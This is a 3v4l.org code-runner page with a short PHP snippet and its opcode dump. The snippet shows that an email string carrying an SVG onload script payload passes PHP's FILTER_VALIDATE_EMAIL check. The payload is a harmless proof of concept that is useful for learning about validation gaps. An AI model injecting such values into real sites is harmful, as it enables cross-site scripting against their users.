3v4l.org

run code in 300+ PHP versions simultaneously
<?php // Payload to bypass simple email validation in PHP $email = '"><svg/onload=confirm(1)>"@x.y'; var_dump(filter_var($email, FILTER_VALIDATE_EMAIL) !== false); // true // To be fair, this is a valid email address as per the RFC (one can try it here: // http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate // Source: https://twitter.com/brutelogic/status/1066333383276593152
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/sVQTG
function name:  (null)
number of ops:  10
compiled vars:  !0 = $email
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    4     0  E >   ASSIGN                                                   !0, '%22%3E%3Csvg%2Fonload%3Dconfirm%281%29%3E%22%40x.y'
    6     1        INIT_FCALL                                               'var_dump'
          2        INIT_FCALL                                               'filter_var'
          3        SEND_VAR                                                 !0
          4        SEND_VAL                                                 274
          5        DO_ICALL                                         $2      
          6        TYPE_CHECK                                  1018  ~3      $2
          7        SEND_VAL                                                 ~3
          8        DO_ICALL                                                 
   11     9      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
159.27 ms | 1009 KiB | 15 Q